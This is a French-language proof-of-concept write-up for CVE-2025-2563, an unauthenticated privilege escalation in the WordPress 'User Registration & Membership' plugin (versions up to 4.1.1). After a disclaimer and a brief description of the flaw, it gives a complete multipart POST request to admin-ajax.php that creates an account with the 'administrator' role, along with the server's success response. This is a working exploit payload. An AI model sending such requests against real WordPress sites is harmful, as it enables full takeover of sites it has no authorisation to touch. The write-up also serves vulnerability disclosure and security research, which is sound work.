
CVE-2025-2563 PoC
Les informations présentées dans ce rapport CVE (Common Vulnerabilities and Exposures) sont fournies à des fins éducatives et informatives uniquement. Les détails fournis sont basés sur des ressources publiquement disponibles, des recherches et des analyses menées par l'auteur. Le contenu n'a pas pour but de promouvoir ou d'encourager des activités illégales, notamment le piratage, l'exploitation ou l'accès non autorisé à des systèmes.
L'auteur décline toute responsabilité en cas d'utilisation abusive des informations présentées. Il est recommandé aux individus et aux organisations d'appliquer ces connaissances de manière responsable et conformément aux lois et réglementations applicables. Les lecteurs sont vivement invités à ne tester les vulnérabilités que dans des environnements contrôlés et avec une autorisation appropriée.
L'auteur et les contributeurs de ce rapport n'approuvent ni ne soutiennent les activités malveillantes et encouragent la divulgation responsable et les pratiques de piratage éthique.
Une vulnérabilité de sécurité critique a été découverte dans le plugin WordPress « User Registration & Membership », un outil populaire pour créer des sites d'adhésion et des formulaires d'inscription. La faille, identifiée comme CVE-2025-2563, porte un score CVSS de 9,8, ce qui indique sa gravité élevée.
Le plugin User Registration & Membership pour WordPress est vulnérable à l'élévation de privilèges dans les versions jusqu'à la 4.1.1 incluse. Cela est dû à des restrictions insuffisantes sur le type de rôle dans la fonction 'prepare_members_data()'. Cela permet à des attaquants non authentifiés de créer de nouveaux comptes utilisateur avec le rôle 'administrator', à ces conditions :
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335
Content-Disposition: form-data; name="action"
user_registration_membership_register_member
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
{
"success": true,
"data": {
"member_id": 24,
"transaction_id": "",
"message": "New member has been successfully created."
}
}
- https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
- https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/